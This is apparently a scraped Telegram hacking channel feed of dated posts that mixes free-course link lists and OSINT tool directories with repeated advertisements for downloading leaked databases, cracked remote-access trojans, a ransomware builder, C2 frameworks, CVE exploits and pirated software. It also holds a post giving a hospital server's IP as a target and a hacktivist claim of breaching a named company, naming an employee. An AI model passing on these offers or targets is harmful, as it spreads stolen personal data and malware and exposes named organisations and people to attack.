Course🔗https://lnkd.in/dYPwDH5G18. Basics of Machine Learning🔗https://lnkd.in/dKRZPDpE19. Data Science with Python🔗https://lnkd.in/dKDQvhFsShare and support us ❤️By : @cybertrickzone
2023-09-16 21:12:42
Google is offering FREE online courses.No payment needed.Here're 10 Google courses to get certified:1. Applied Data Science with PythonBecome a Data Scientist with this awesome program.→ 6 hours to complete→ 8 Chapters→ FREE Certificate🔗 https://lnkd.in/dTf3QUMb2. Fundamentals of Digital MarketingLearn how to use the internet to grow your business or career.→ 40 hours to complete→ Beginner friendly→ FREE Certificate🔗 https://lnkd.in/df_2wSDX3. Google Analytics 4 CertificationLearn how to use Google Analytics 4, the best web analytics tool, to grow your online business.→ 5 hours to complete→ Intermediate level→ Data-driven marketing→ FREE certificate🔗 https://lnkd.in/ddjFSQcM4. Google Ads Search CertificationShow your skill in creating and optimizing Google Search campaigns that reach your goals.→ 4 hours to complete→ Intermediate level→ FREE certificate🔗 https://lnkd.in/duH6e3Z45. Google Ads Display CertificationLearn how to use Google Display features, optimize your campaigns, and measure your results.→ 3 hours to complete→ Beginner level→ FREE certificate🔗 https://lnkd.in/dDCSAwSk6. YouTube Music CertificationLearn how to use YouTube Music, the best music streaming service, to grow your audience, monetize your content, and optimize your performance.→ 4 hours to complete→ Advanced level→ FREE certificate🔗 https://lnkd.in/dRtUDUmS7. Get started with Google Maps PlatformLearn how to use Google Maps Platform to create interactive web maps and manage your projects in the Google Cloud Console.🔗 https://lnkd.in/dmfKbWnu8. Build apps with FlutterLearn the skills to create visually appealing desktop, mobile, and web applications using Flutter, all built from a single codebase.🔗 https://lnkd.in/dAJ4tXy89. Introduction to SQLDiscover the fundamentals of utilizing SQL for extracting and controlling data within a relational database.🔗 https://lnkd.in/dtbGAEu410. Generative AI [Mega Course]Learn everything you need to know about generative AI products and technologies in this comprehensive course.🔗 https://lnkd.in/dcUbCAPBHappy Learning 🌟----------------------------------------------------------------------if you found this post helpful:1️⃣ Join Telegram for more Free Coding & AI Courses, hacking courses , tech and tips https://telegram.me/cybertrickzone
2023-09-16 18:09:56
☀️Password cracking techniques☀️There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below;✔️Dictionary attack– This method involves the use of a wordlist to compare against user passwords.✔️Brute force attack– This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.✔️Rainbow table attack– This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.✔️Guess– As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.✔️Spidering– Most organizations use passwords that contain company information. This information can be found on company websites, social media such as facebook, twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.
2023-09-16 17:30:19
ChatGPT Next Web : ExploreShodan Dorks 2023 : ExploreSQL Injection URL Scraper : ExploreHUMAN GENERATOR Online : ExploreHackBot - AI Cybersecurity Chatbot : ExploreCanadian Nurses Association Data Leak : ExploreXWorm V5.0 Cracked : DownloadAnti-kill PHP Trojan Generator : Explore
2023-09-16 16:13:26
A Beginner's Guide to OSINT WebinarOSINT Ambition presents you a free webinar on A Beginner's Guide to Open Source Intelligence. The webinar details are described below:Platform: Google MeetDate: September 23th, 2023Link: https://forms.gle/6jNxvm3A5aANssJa7
2023-09-16 09:16:37
📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download🐸International Civil Defense Organization Data Leak : Download🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory Traversal : Explore🕸Invicti Standard v23.9.0.42095 Crack : Download📯Sartrouville Company France Data Leak : Download🌚Aranui Cruises Data Leak : Download🐀Craxs Rat V6.7 : DOwnload🪬URL Infection: Exploit Silent Java Drive By Downloads Chrome : Explore🧮CVE-2023-41362 – MyBB ACP RCE Exploit : Explore 👾CVE-2023-3244 POC: WordPress Missing Authorization: Explore📍OpenText EnCase Forensic Tool : Download🐲Telegram Get remote IP: Get IP Address on Other Side Audio Call In Telegram : Check
2023-09-16 05:29:13
🚨𝗠𝗼𝘇𝗶𝗹𝗹𝗮 𝟬-𝗗𝗮𝘆 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗘𝘅𝗽𝗹𝗼𝗶𝘁. 🚨Make sure you UPDATE Your Browser 👍𝗟𝗶𝗻𝗸: https://youtube.com/shorts/rNVi-TsKL1k?si=d7ZLICF1Q9N8cxJ9
2023-09-15 16:28:10
https://t.me/globeEyeJoin For Latest current affairs News
2023-09-15 04:55:00
𝟮𝟱𝟬+ 𝗩𝗶𝗲𝘄 😍🥳🔥𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄: https://youtu.be/LGKBB3ycU38?si=3PCpqHip6aROVPKMLike & Support our YouTube channel for more Penetration Testing & Bug Bounty Videos 🤑
2023-09-15 01:40:01
CrackCodes 🇮🇳 pinned «📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download 🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download 🐸International Civil Defense Organization Data Leak : Download 🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory…»
2023-09-15 01:37:06
📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download🐸International Civil Defense Organization Data Leak : Download🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory Traversal : Explore🕸Invicti Standard v23.9.0.42095 Crack : Download📯Sartrouville Company France Data Leak : Download🌚Aranui Cruises Data Leak : Download🐀Craxs Rat V6.7 : DOwnload🪬URL Infection: Exploit Silent Java Drive By Downloads Chrome : Explore🧮CVE-2023-41362 – MyBB ACP RCE Exploit : Explore 👾CVE-2023-3244 POC: WordPress Missing Authorization: Explore📍OpenText EnCase Forensic Tool : Download🐲Telegram Get remote IP: Get IP Address on Other Side Audio Call In Telegram : Check
2023-09-14 20:25:32
🦹‍♂🦹‍♂Web Intelligence Researching Domains🦹‍♂🦹‍♂ Web intelligence (WEBINT) is a means to efficiently identify the intelligence available in open source (OSINT). Structuring and visualizing web-based information allows an analyst to surface tactical information like technical indicators, and strategic understandings like the swaying sentiment of a troubled region. 🍎Tools Link 🍎🍏Access Check https://accesscheck.thenetmonitor.org 🍏AFRINIC https://www.afrinic.net 🍏APNIC https://www.apnic.net 🍏ARIN https://www.arin.net 🍏 Website Search Tool https://www.aware-online.com/osint-tools/website-search-tool 🍏Better Whois http://www.betterwhois.com 🍏Central Ops http://centralops.net 🍏Complete DNS https://completedns.com 🍏Daily Changes http://dailychanges.domaintools.com 🍏Danger Zone https://github.com/woj-ciech/Danger-zone 🍏Da.whois https://dawhois.com 🍏Dedicated or Not http://dedicatedornot.com 🍏Denic web whois https://www.denic.de/webwhois 🍏DNSDumpster https://dnsdumpster.com 🍏DNS History http://dnshistory.org 🍏DNS Lookup https://dnslookup.online 🍏DNSlytics https://dnslytics.com 🍏dnspop https://github.com/bitquark/dnspop 🍏DNS Queries https://www.dnsqueries.com 🍏dnsrecon https://github.com/darkoperator/dnsrecon 🍏DNS Root Instances https://atlas.ripe.net/results/maps/root-instances 🍏DNSSec Analyzer https://dnssec-analyzer.verisignlabs.com🍏IMK-CREDITS https://bio.cool/itsmekali 🍏DNS Spy https://dnsspy.io🍏DNSStuff http://www.dnsstuff.com 🍏DNSTools http://www.dnstools.ch 🍏DNS Trails http://dnstrails.com 🍏DNS Trails https://securitytrails.com/dns-trails 🍏dnstwist https://github.com/elceef/dnstwist 🍏dnstwist https://dnstwist.it 🍏dnstwister https://dnstwister.report 🍏DNSViz http://dnsviz.net 🍏Domain Big Data http://domainbigdata.com 🍏Domain Crawler http://www.domaincrawler.com 🍏Domain Dossier http://centralops.net/co/DomainDossier.aspx 🍏Domain Eye https://domaineye.com 🍏DomainIQ https://www.domainiq.com 🍏Domain SDB https://domainsdb.info 🍏Domain To IP Converter http://domaintoipconverter.com 🍏Domain Tools https://www.domaintools.com 🍏Domain Tools http://whois.domaintools.com 🍏DomEye https://xaviesteve.com/domeye 🍏downdetector http://downdetector.com 🍏downforeveryoneorjustme http://downforeveryoneorjustme.com 🍏DNS Checker https://dnschecker.org 🍏DShield API https://isc.sans.edu/api 🍏EasyCounter WHois https://whois.easycounter.com 🍏Easy whois https://www.easywhois.com 🍏Educause Whois Lookup https://net.educause.edu/whois.htm 🍏Geektools http://www.geektools.com/whois.php 🍏Lookup https://www.infobyip.com/ipbulklookup.php 🍏Network Tools http://network-tools.com 🍏NS.Tools https://ns.tools Onyphe https://www.onyphe.io 🍏OpenData Rapid7 https://opendata.rapid7.com 🍏The Prefix Whois Project https://pwhois.org 🍏PTRArchive http://ptrarchive.com 🍏Purplepee.com https://purplepee.co 🍏RedirectDetective http://redirectdetective.com
2023-09-14 20:24:13
50 Linux commands for our day-to-day work:1. ls - List directory contents.2. pwd - Display current directory path.3. cd - Change directory.4. mkdir - Create a new directory.5. mv - Move or rename files.6. cp - Copy files.7. rm - Delete files.8. touch - Create an empty file.9. rmdir - Remove directory.10. cat - Display file content.11. clear - Clear terminal screen.12. echo - Output text or data to a file.13. less - View text files page-by-page.14. man - Display command manual.15. sudo - Execute commands with root privileges.16. top - Show system processes.17. tar - Archive files into tarball.18. grep - Search for text within files.19. head - Display file's beginning lines.20. tail - Show file's ending lines.21. diff - Compare two files' content.22. kill - Terminate processes.23. jobs - List active jobs.24. sort - Sort lines of a text file.25. df - Display disk usage.26. du - Show file or directory size.27. zip - Compress files into zip format.28. unzip - Extract zip archives.29. ssh - Secure connection between hosts.30. cal - Display calendar.31. apt - Manage packages.32. alias - Create command shortcuts.33. w - Show current user details.34. whereis - Locate binaries, sources, and manuals.35. whatis - Provide command description.36. useradd - Add a new user.37. passwd - Change user password.38. whoami - Display current user name.39. uptime - Show system runtime.40. free - Display memory status.41. history - List command history.42. uname - Provide system details.43. ping - Check network connectivity.44. chmod - Modify file/directory permissions.45. chown - Change file/directory owner.46. find - Search for files/directories.47. locate - Find files quickly.48. ifconfig - Display network interfaces.49. ip a - List network interfaces succinctly.50. finger - Retrieve user information.
2023-09-14 15:52:44
@CYBERDIN1 💀
2023-09-14 15:47:43
🪅ZIPMEX Database Leak : Download📌U Mobile Malaysia Data Leak : Download👾Remcos RAT 1.7 Cracked (Cleaned) : Download🐲MTS Bank Russia 1 Million Customer Data Leak : Download💩XSS VIBES – Automatic Xss Finder : Download📯Media-Library Plugin CVE-2023-4634 Exploit : Download🪬HTMLSmuggle : Download🐀Andromeda-RAT : Download
2023-09-14 05:20:32
𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗧𝗶𝗽:XSS Payloads without Parenthesis. 𝗟𝗶𝗻𝗸:https://twitter.com/thecybertix/status/1702189436325474459?t=qkpvvsPKU1G3MFDz55Ht0A&s=19
2023-09-13 21:52:08
𝐅𝐫𝐞𝐞 𝐂𝐞𝐫𝐭𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬 𝐭𝐨 𝐚𝐝𝐝 𝐭𝐨 𝐲𝐨𝐮𝐫 𝐑𝐞𝐬𝐮𝐦𝐞 𝐢𝐧 𝟐𝟎𝟐𝟑:🔸Data Science https://mylearn.oracle.com/ou/learning-path/become-an-oci-data-science-professional-2023/121944🔸React https://hackerrank.com/skills-verification/react_basic🔸Angular https://hackerrank.com/skills-verification/angular_intermediate🔸SEO https://academy.hubspot.com/courses/seo-training🔸Digital Marketing from Google http://learndigital.withgoogle.com/digitalgarage/course/digital-marketing🔸Cloud Security https://mylearn.oracle.com/ou/learning-path/become-a-cloud-security-professional-2023/121923🔸Web Dev (HTML and CSS) https://freecodecamp.org/learn/2022/responsive-web-design/🔸Python https://cs50.harvard.edu/python/🔸JavaScript https://hackerrank.com/skills-verification/javascript_intermediate🔸DevOps https://mylearn.oracle.com/ou/learning-path/become-an-oci-devops-professional-2023/121756🔸Machine Learning https://freecodecamp.org/learn/machine-learning-with-python/🔸Java https://data-flair.training/courses/free-java-course/🔸C++ http://learn.saylor.org/course/view.php?id=65🔸Go https://hackerrank.com/skills-verification/golang_intermediate🔸Neo4j Certified Professional https://graphacademy.neo4j.com/courses/neo4j🔸Redis Certified Developer https://university.redis.com/certification/🔸MongoDB https://learn.mongodb.com/learning-paths/mongodb-for-sql-professionals🔸Backend Development https://freecodecamp.org/learn/back-end-development-and-apis/🔸SQL https://hackerrank.com/skills-verification/sql_advanced
2023-09-13 14:53:39
ChatGPT Next Web : ExploreShodan Dorks 2023 : ExploreSQL Injection URL Scraper : ExploreHUMAN GENERATOR Online : ExploreHackBot - AI Cybersecurity Chatbot : ExploreCanadian Nurses Association Data Leak : ExploreXWorm V5.0 Cracked : DownloadAnti-kill PHP Trojan Generator : Explore
2023-09-13 08:59:44
30 FREE Cyber Security Certifications and Trainings.1. CCNA Security: lnkd.in/gfby3CR22. Intro to Information Security: lnkd.in/ggdYxnUp3. Networking Essentials: lnkd.in/gjipDpgG4. Cybersecurity Essentials: lnkd.in/gZe6bf-t5. Network Security: lnkd.in/gSHx2tJQ6. NSE 1,2 & 3: lnkd.in/gsQJhn2a7. Information Security: lnkd.in/gvfghKNs8. Network Security by OpenLearn: lnkd.in/gS2KWNfN9. Risk Management by Open Learn: lnkd.in/gGPTDU2g10. Certified in Cybersecurity℠ - CC: lnkd.in/gW3w8Jqu11. Introduction to Cybersecurity: lnkd.in/ghQY8cKA12. Network Defense Essentials (NDE): lnkd.in/g6mRKt2t13. Ethical Hacking Essentials (EHE): lnkd.in/gRBGCud714. Digital Forensics Essentials (DFE): lnkd.in/gPrkYcDH15. Dark Web, Anonymity, and Cryptocurrency: lnkd.in/gUrCCGdf16. Digital Forensics by Open Learn: lnkd.in/gdv8emgt17. AWS Cloud Certifications (Cybersecurity) : lnkd.in/gaDGWdkm18. Microsoft Learn for Azure: lnkd.in/gDpkXiik19. Google Cloud Training: lnkd.in/get8rnkh20. Android Bug Bounty Hunting: Hunt Like a Rat: lnkd.in/gMNT8saN21. Vulnerability Management: lnkd.in/gvNKJnni22. Software Security: lnkd.in/gG4P5bkn23. Developing Secure Software: lnkd.in/gQRwTzKU24. PortSwigger Web Hacking: lnkd.in/eEa-fNfu25. RedTeaming: lnkd.in/et_T2DEa26. Splunk: lnkd.in/et5bkjeY27. Secure Software Development: lnkd.in/ebGpA4wG28. Maryland Software Security: lnkd.in/e3z4zFmJ29. Stanford Cyber Resiliency: lnkd.in/eg9BM5Bv30. Cyber Threat Intelligence: lnkd.in/eWY_tD72Credit: het MehtaBy @cybertrickzone Keep support and share ❤️
2023-09-13 05:49:55
𝟯𝟬𝟬𝟬$ 𝗕𝗼𝘂𝗻𝘁𝘆 🤑𝗕𝘂𝗴: XSS leads to Account TakeOver. 𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/hyCseXQuIVE?si=9P61NcD6-iS2tjLI
2023-09-12 11:52:17
https://github.com/yeahhub/Hacking-Security-Ebooks
2023-09-11 09:46:52
🦚 FREE Resources to Learn & Practice Python 🦚#Python1. https://www.freecodecamp.org/learn/data-analysis-with-python/#data-analysis-with-python-course2. https://www.hackerrank.com/domains/python3. https://www.hackerearth.com/practice/python/getting-started/numbers/practice-problems/4. https://learnpython.org/5. https://www.w3schools.com/python/python_exercises.asp6. https://pythonbasics.org/exercises/7. https://www.geeksforgeeks.org/python-programming-language/learn-python-tutorial━━━━━━#Free_Course━━━━━━━Share nd support 🤟😉      @cybertrickzone 😘
2023-09-11 05:04:59
𝗖𝗦𝗥𝗙 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 😎🔥𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is CSRF? 𝟮. Workflow of CSRF? 𝟯. How & where to Find it. 𝟰. Free CSRF PoC Generator Tool 😨🔥. 𝗡𝗢𝗧𝗘: Working of CSRF PoC Tool Explained in the Video. Please Share your Views & Subscribe to our Channel you can learn New Vulnerability Topic 𝗘𝘃𝗲𝗿𝘆 𝗪𝗲𝗲𝗸 😎🙌𝗟𝗶𝗻𝗸:https://youtu.be/LGKBB3ycU38?si=fwHXF7p6xtJt-b3E
2023-09-10 17:33:05
Follow our publication at Medium. https://publication.osintambition.orgJoin the OSINT Ambition community and take your investigative skills to the next level! We share expert tips, tools, and insights on OSINT.Wanted to join as a writer, read this blog.https://publication.osintambition.org/join-us-as-a-writer-at-osint-ambition-d6b432535a12Show some love ❤️💕
2023-09-09 16:32:24
gg's hacker's ( I love you —❤️ ‼️Here we go again here we go again 🎉dot (aka Deepfake Offensive Toolkit) makes real-time, controllable deepfakes ready for virtual cameras injection. dot is created for performing penetration testing against e.g. identity verification.https://github.com/sensity-ai/dot #hacker_bano_chutiya_nhe 👁
2023-09-09 15:37:49
CrackCodes 🇮🇳 pinned «🪅ZIPMEX Database Leak : Download 📌U Mobile Malaysia Data Leak : Download 👾Remcos RAT 1.7 Cracked (Cleaned) : Download 🐲MTS Bank Russia 1 Million Customer Data Leak : Download 💩XSS VIBES – Automatic Xss Finder : Download 📯Media-Library Plugin CVE-2023…»
2023-09-09 15:36:38
🪅ZIPMEX Database Leak : Download📌U Mobile Malaysia Data Leak : Download👾Remcos RAT 1.7 Cracked (Cleaned) : Download🐲MTS Bank Russia 1 Million Customer Data Leak : Download💩XSS VIBES – Automatic Xss Finder : Download📯Media-Library Plugin CVE-2023-4634 Exploit : Download🪬HTMLSmuggle : Download🐀Andromeda-RAT : Download
2023-09-09 10:26:43
WAMPSERVER : ABWA HOSPITAL & RESEARCH CENTRE pakistan: Faisalabad182.176.147.69to much fun there #hacker_bano_chutiya_nhe #pkmc_ontop
2023-09-09 04:58:07
𝟭𝟱𝟬+ 𝗩𝗶𝗲𝘄 𝗼𝗻 𝗔𝗱𝘃. 𝗧𝗼𝗽𝗶𝗰🥳𝗜𝗡𝗦𝗘𝗖𝗨𝗥𝗘 𝗗𝗘𝗦𝗘𝗥𝗜𝗔𝗟𝗜𝗭𝗔𝗧𝗜𝗢𝗡𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄: https://youtu.be/WGhNgXnoNjY?si=VmUzkGJ8Kub4QpmR
2023-09-08 15:36:59
B-L-I success, I M Wapas Aa gaya
2023-09-08 11:50:26
A Beginners Guide to OSINT | Day1 of 30DaysOfOSINThttps://hacklido.com/blog/598-a-beginners-guide-to-osint-day1-of-30daysofosintLet me know the feedback in comments.
2023-09-08 10:18:38
Join our channel https://t.me/CodeSecurityVault
2023-09-08 05:45:00
https://github.com/yeahhub/Hacking-Security-Ebooks
2023-09-08 04:53:43
𝗦𝘂𝗰𝘂𝗿𝗶 𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 🔥𝗟𝗶𝗻𝗸: https://twitter.com/thecybertix/status/1700007652280148221?t=slE9jIwNO0g0wdeLU7WJIQ&s=19
2023-09-08 00:05:51
🚫🚫New refferal events live 🚫🚫I just signed up on this awesome newsletter!Register 👇👇👇https://sparklp.co/affef709/Only need mail id 5 refer sticker15 refer mug 25 refer notebook50 refer cap100 refer bag500 refer mystery boxYou can get you referal link on mail tomorrow with the Newsletter on the mail at the end of the mailNote Your referal will not be updated fast you need to wait for 2 days to get your referal confirm
2023-09-07 18:05:18
𝗠𝗼𝘀𝘁 𝗔𝗱𝘃 𝗧𝗼𝗽𝗶𝗰 𝗖𝗼𝘃𝗲𝗿𝗲𝗱😨𝗕𝘂𝗴: ɪɴsᴇᴄᴜʀᴇ ᴅᴇsᴇʀɪᴀʟɪᴢᴀᴛɪᴏɴ𝗡𝗢𝗧𝗘: ‼️Watch this video Completely to understand properly‼️𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is Serializarion? 𝟮. How Deserialization works𝟯. PHP Deserialization attack𝗣𝗹𝗲𝗮𝘀𝗲 𝘀𝗵𝗮𝗿𝗲 𝘆𝗼𝘂𝗿 𝗩𝗶𝗲𝘄𝘀 𝗶𝗻 𝗖𝗼𝗺𝗺𝗲𝗻𝘁 𝗦𝗲𝗰𝘁𝗶𝗼𝗻. 𝗬𝗼𝘂𝗿 𝗙𝗲𝗲𝗱𝗯𝗮𝗰𝗸 𝗮𝗿𝗲 𝘃𝗮𝗹𝘂𝗮𝗯𝗹𝗲🙏🏻🙌🏻𝙇𝙞𝙣𝙠: https://youtu.be/WGhNgXnoNjY?si=IyRrSVv2gSbwFhSd
2023-09-07 15:14:11
Free courses to learn Data Science in 2023:🔸Pythonhttps://lnkd.in/dRc7EEwW🔸SQLhttps://lnkd.in/dpbmD-sB🔸Rhttps://lnkd.in/dz7ezJGS🔸PowerBIhttps://lnkd.in/dsaT3X67🔸Mathematicshttps://lnkd.in/dj866aXa🔸Tableautableau.com/learn/training🔸Excel and PowerBIhttps://lnkd.in/d3QQupqd🔸Probabilityhttps://lnkd.in/djAJ996Q🔸Statisticshttps://lnkd.in/d3_eCPjX🔸Linear Algebrahttps://lnkd.in/dw3zphMS🔸Machine Learninghttps://lnkd.in/dESYz7Vn🔸Deep Learningintrotodeeplearning.com🔸Data Analysishttps://lnkd.in/dw3zphMS🔸Data Visualizationhttps://lnkd.in/djAJ996Q#learning #free #dataanalysis #success #datascience #2023
2023-09-07 14:18:07
🧮📌Ekohesap Information Technologies Inc Turkey Leak : https://system32.ink/ekohesap-information-technologies-inc-turkey-leak/📍📍NetRadar : https://system32.ink/netradar/🖨🪅Granada Energy Corporation Data Leak : https://system32.ink/granada-energy-corporation-data-leak/📟📌Ad-Link-Bypasser-Bot : https://system32.ink/ad-link-bypasser-bot/ 📟🧮TBBRAT – Power Full BotNet : https://system32.ink/tbbrat-power-full-botnet/ 🪅📍Cortex XSOAR 6.11 Enterprise : https://system32.ink/cortex-xsoar-6.11-enterprise/@Crackcodes | System32.ink | Crackcodes.in
2023-09-07 05:04:05
https://youtu.be/tPMWozgzSMc?si=XWkoUv4-zCr9yI_K
2023-09-06 13:34:22
🪅MIDHCO Data Leak : https://system32.ink/midhco-data-leak/📟NtRemoteLoad – Remote Shellcode Injector : https://system32.ink/ntremoteload-remote-shellcode-injector/🐀TelegramRAT : https://system32.ink/telegramrat/🧮CVE-2023-38831 Winrar Exploit Generator : https://system32.ink/cve-2023-38831-winrar-exploit-generator/👾CVE-2023-39063 Poc : https://system32.ink/cve-2023-39063-poc/🪬JupiterX Core Premium Plugin Mass Exploit – CVE-2023-38388 : https://system32.ink/jupiterx-core-premium-plugin-mass-exploit-cve-2023-38388/📯JDK CVE-2023-21939 POC : https://system32.ink/jdk-cve-2023-21939-poc/
2023-09-06 04:53:28
𝟭𝟬𝟬$ for ClickJacking Vulnerability on Yelp 😍🔥𝗟𝗶𝗻𝗸: https://youtu.be/tPMWozgzSMc?si=W60PlFaoHUbMastu
2023-09-05 20:13:44
🚫🚫New refferal events live 🚫🚫I just signed up on this awesome newsletter!Register 👇👇👇https://sparklp.co/affef709/Only need mail id 5 refer sticker15 refer mug 25 refer notebook50 refer cap100 refer bag500 refer mystery boxYou can get you referal link on mail tomorrow with the Newsletter on the mail at the end of the mailNote Your referal will not be updated fast you need to wait for 2 days to get your referal confirm
2023-09-04 18:30:59
📌Empower Insurance Data Leak : Download🪅Xavier Marks Indonesian Data Leak : Download📟CVE-2023-34039 Exploit Poc : Download🐲Shodan Dorks 2023 : Download📯NOVI PAZAR – PUT Data Leak : Download🕸CVE-2023-4596 Forminator WordPress Plugin Exploit : Download🪬ChatGPT Next Web : Download🐀XWorm v5.0 RAT Cracked : Download
2023-09-04 05:58:15
𝗠𝗼𝘀𝘁 𝗔𝗱𝘃 𝗧𝗼𝗽𝗶𝗰 𝗖𝗼𝘃𝗲𝗿𝗲𝗱😨𝗕𝘂𝗴: ɪɴsᴇᴄᴜʀᴇ ᴅᴇsᴇʀɪᴀʟɪᴢᴀᴛɪᴏɴ𝗡𝗢𝗧𝗘: ‼️Watch this video Completely to understand properly‼️𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is Serializarion? 𝟮. How Deserialization works𝟯. PHP Deserialization attack𝗣𝗹𝗲𝗮𝘀𝗲 𝘀𝗵𝗮𝗿𝗲 𝘆𝗼𝘂𝗿 𝗩𝗶𝗲𝘄𝘀 𝗶𝗻 𝗖𝗼𝗺𝗺𝗲𝗻𝘁 𝗦𝗲𝗰𝘁𝗶𝗼𝗻. 𝗬𝗼𝘂𝗿 𝗙𝗲𝗲𝗱𝗯𝗮𝗰𝗸 𝗮𝗿𝗲 𝘃𝗮𝗹𝘂𝗮𝗯𝗹𝗲🙏🏻🙌🏻𝙇𝙞𝙣𝙠: https://youtu.be/WGhNgXnoNjY?si=IyRrSVv2gSbwFhSd
2023-09-04 04:53:56
🕸Department of Defence South African (DARPA) Data Leak : Download🏥Canadian Nurses Association Data Leak : Download👾HackBot – AI Cybersecurity Chatbot : Download🧮CVE-2023-30943 Moodle Exploit : Download🐲CVE-2023-41717 Zscaler Proxy Exploit : Download📟B(l)utter – Flutter Mobile Application Reverse Engineering Tool : Download🪬GreenBot : Download
2023-09-04 04:43:58
We would like to bring to your attention on a recent security breach incident Between Indra Sistemas, a prominent Spanish information technology & defense systems company with Anti-Indian Nation (Pakistan) Dealing on Defence Equipment Was HACKED BY US.This incident has raised concerns about their engagement with nation (Pakistan) that support terrorism and may lack ethical standards in addressing the needs of their citizens.I just made them Feel How Close we are.....!! In picture:Simon Arnold: Account Manager Sales, Marketing, and Customer Relationship Management Deals in the High Technology and Air Traffic Management (ATM) and provides high-value and complex surveillance and communications systems to Foreign Civil Government Agencies and Defence Departments.
2023-09-03 13:41:31
👾GX40 Ransomware Builder : Download📟RogueSliver - C2 Framework : Download📯HookBot Android Malware Leak : Download🪬SQL-Login-Bypass Script : Download📍Anti-kill PHP Trojan Generator : Download🕸Nvidia Corporation Leak : Download🐲CVE-2023-35078 Exploit : Download99 Cents Only Stores Data Leak : Download
2023-09-02 18:30:43
Wish Janamdin ki Shubhkamnaye / Happy Birthday In your little Brother And My Friend >> @wenako In His DM#janamdin_ki_hardik_shubhkamnaye_wrick❤️Ishwar Gives You Happy Life
2023-09-02 11:44:13
None
2023-09-02 08:21:39
Aditya-L1 Mission:The launch of Aditya-L1 by PSLV-C57 is accomplished successfully.The vehicle has placed the satellite precisely into its intended orbit.India’s first solar observatory has begun its journey to the destination of Sun-Earth L1 point.Aditya-L1 started generating the power.The solar panels are deployed.The first EarthBound firing to raise the orbit is scheduled for September 3, 2023, around 11:45 Hrs.#AdityaL1
2023-09-02 06:44:51
None
2023-09-02 04:07:00
The #AdityaL1 satellite carrying seven indigenously developed payloads will lift off from the second launch pad of Satish Dhawan Space Centre (SDSC-Shar) at #Sriharikota on a PSLV-C57 rocket today at 11.50 am.
2023-09-02 02:08:27
CrackCodes 🇮🇳 pinned «🕸Department of Defence South African (DARPA) Data Leak : Download 🏥Canadian Nurses Association Data Leak : Download 👾HackBot – AI Cybersecurity Chatbot : Download 🧮CVE-2023-30943 Moodle Exploit : Download 🐲CVE-2023-41717 Zscaler Proxy Exploit : Download…»
2023-09-02 02:06:50
🕸Department of Defence South African (DARPA) Data Leak : Download🏥Canadian Nurses Association Data Leak : Download👾HackBot – AI Cybersecurity Chatbot : Download🧮CVE-2023-30943 Moodle Exploit : Download🐲CVE-2023-41717 Zscaler Proxy Exploit : Download📟B(l)utter – Flutter Mobile Application Reverse Engineering Tool : Download🪬GreenBot : Download
2023-09-01 19:31:56
Hello everyonePlease join our new channel for ebooks, pdfs , Handwritten notes based on topics coding, programming, cyber security etc.Link :- https://t.me/CodeSecurityVaultChannel moto :- "Unlock the secrets of coding and fortify your digital defenses with Code And Security Vault. Dive into a treasure trove of programming wisdom, cyber security insights, and valuable resources. Join us as we safeguard the digital realm and empower developers and security enthusiasts alike."
2023-09-01 10:34:29
https://youtube.com/shorts/LnIJhJcXwmQ?feature=share
2023-09-01 02:39:16
🪅ReadyAPI v3.47.0 Crack : Download📍CVE-2021-21972 Vcenter Exploitation Toolkit : Download🧮LanSweeper Licensed : Download🖨Postel – S.P.A Data Leak : Download🪬EternalHush Advance C2 Framework : Download📯Tomsk State University’s Main System Source Code : Download👾Capital Television Belarus Data Leak : Download🕸CVE-2023-27163-InternalProber : Download
2023-09-01 01:16:14
CrackCodes 🇮🇳 pinned «👾GX40 Ransomware Builder : Download 📟RogueSliver - C2 Framework : Download 📯HookBot Android Malware Leak : Download 🪬SQL-Login-Bypass Script : Download 📍Anti-kill PHP Trojan Generator : Download 🕸Nvidia Corporation Leak : Download 🐲CVE-2023-35078 Exploit…»
2023-08-31 17:35:05
https://youtu.be/Q2C52gKDHKI
2023-08-31 15:22:35
https://trickypenguin.ink/the-five-phases-of-penetration-testing/#pentesting #cybersecurity
2023-08-31 06:39:17
👾GX40 Ransomware Builder : Download📟RogueSliver - C2 Framework : Download📯HookBot Android Malware Leak : Download🪬SQL-Login-Bypass Script : Download📍Anti-kill PHP Trojan Generator : Download🕸Nvidia Corporation Leak : Download🐲CVE-2023-35078 Exploit : Download99 Cents Only Stores Data Leak : Download
2023-08-31 05:41:15
